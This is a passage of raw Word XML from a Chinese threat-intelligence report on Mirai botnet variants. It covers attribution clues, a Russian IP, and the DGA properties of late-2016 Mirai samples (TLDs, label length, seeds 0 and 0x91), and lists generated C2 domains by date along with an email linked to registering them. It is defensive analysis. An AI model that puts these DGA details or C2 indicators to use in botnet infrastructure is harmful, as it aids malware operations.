      </w:r>
    </w:p>
    <w:p w:rsidR="00450BA2" w:rsidRDefault="00450BA2" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>update.kernelorg.download</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450BA2" w:rsidRPr="00450BA2" w:rsidRDefault="00450BA2" w:rsidP="00450BA2">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRDefault="003C6ECE" w:rsidP="003C6ECE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED6F99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>360分析了一天内各个时段控制指令数量分布，认为控制者位于欧洲和美洲，以欧洲为甚，应</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED6F99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED6F99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>位于北京时区</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1935579255"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 36016 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">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[8]</w:t>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00ED6F99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED6F99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>绿盟给出</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED6F99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>了一个位于俄罗斯的IP地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6F99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>37.139.59.69</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-101658106"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 绿盟科16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">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[9]</w:t>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00ED6F99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00583BC0" w:rsidRDefault="00583BC0" w:rsidP="00583BC0"/>
    <w:p w:rsidR="003714FD" w:rsidRPr="003714FD" w:rsidRDefault="00DA0103" w:rsidP="00F63C30">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003714FD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2016年12月9日左右，360网络安全研究院报告了带DGA特征的Mirai</w:t>
      </w:r>
      <w:r w:rsidR="00EC03BC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>样本</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1092553071"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 360162 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[10]</w:t>
          </w:r>
          <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，其编码属性包括</w:t>
      </w:r>
      <w:r w:rsidR="003714FD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</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使用3个顶级域名：online/tech/support</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L2域名固定长度12字符，每个字符从“a”到“z</w:t>
      </w:r>
      <w:r w:rsidR="00F63C30" w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”中随机选择</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003714FD" w:rsidRPr="00F63C30" w:rsidRDefault="00F63C30" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>域名仅</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>由月、日和硬编码的种子字符串确定</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每天只生成一个域名，因此最多存在365个 DGA</w:t>
      </w:r>
      <w:r w:rsidR="00F63C30" w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>域名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003714FD" w:rsidRPr="00F63C30" w:rsidRDefault="003714FD" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DGA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>域名仅</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在硬编码的C2</w:t>
      </w:r>
      <w:r w:rsidR="00F63C30" w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>域名无法解析时使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40B90" w:rsidRPr="00B40B90" w:rsidRDefault="00B40B90" w:rsidP="00583BC0"/>
    <w:p w:rsidR="00583BC0" w:rsidRPr="00F63C30" w:rsidRDefault="00F1354A" w:rsidP="00F63C30">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="00B71D8D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidR="00EC03BC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该样本</w:t>
      </w:r>
      <w:r w:rsidR="00B71D8D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行分析，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>他们</w:t>
      </w:r>
      <w:r w:rsidR="00B71D8D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r w:rsidR="00EC03BC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>种子值为0。</w:t>
      </w:r>
      <w:r w:rsidR="005E3C78" w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>其中部分域名已经被MIRAI作者注册，列表如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E3C78" w:rsidRDefault="00F63C30" w:rsidP="00583BC0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1988592"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="http://blog.netlab.360.com/content/images/2016/12/mirai_dga_registered_by_auth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etlab.360.com/content/images/2016/12/mirai_dga_registered_by_auth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88592"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63C30" w:rsidRDefault="00F63C30" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="420" w:afterAutospacing="0" w:line="473" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F63C30">
        <w:t>作者 dlinchkravitz@gmail.com在更早时间已经注册了其他mirai C2域名zugzwang.me</w:t>
      </w:r>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="420" w:afterAutospacing="0" w:line="473" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年12月16日，</w:t>
      </w:r>
      <w:r w:rsidRPr="003714FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>360网络安全研究院</w:t>
      </w:r>
      <w:r w:rsidR="00466B3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>借助于其Passive</w:t>
      </w:r>
      <w:r w:rsidR="00466B3F">
        <w:t>DNS系统发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了DGA种子值为0x91的Mirai样本，其生成的部分域名及对应日期值如下:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/08 pcrpxewicouh.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/09 rwoywonuobcr.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/10 liusqxocbedg.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/11 ndoiabgxgmew.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/12 hwjqtwkectlo.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/13 mtoyrjnvlqdx.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/14 ddfqdttkmoyv.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/15 iaxjxyqjckqi.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
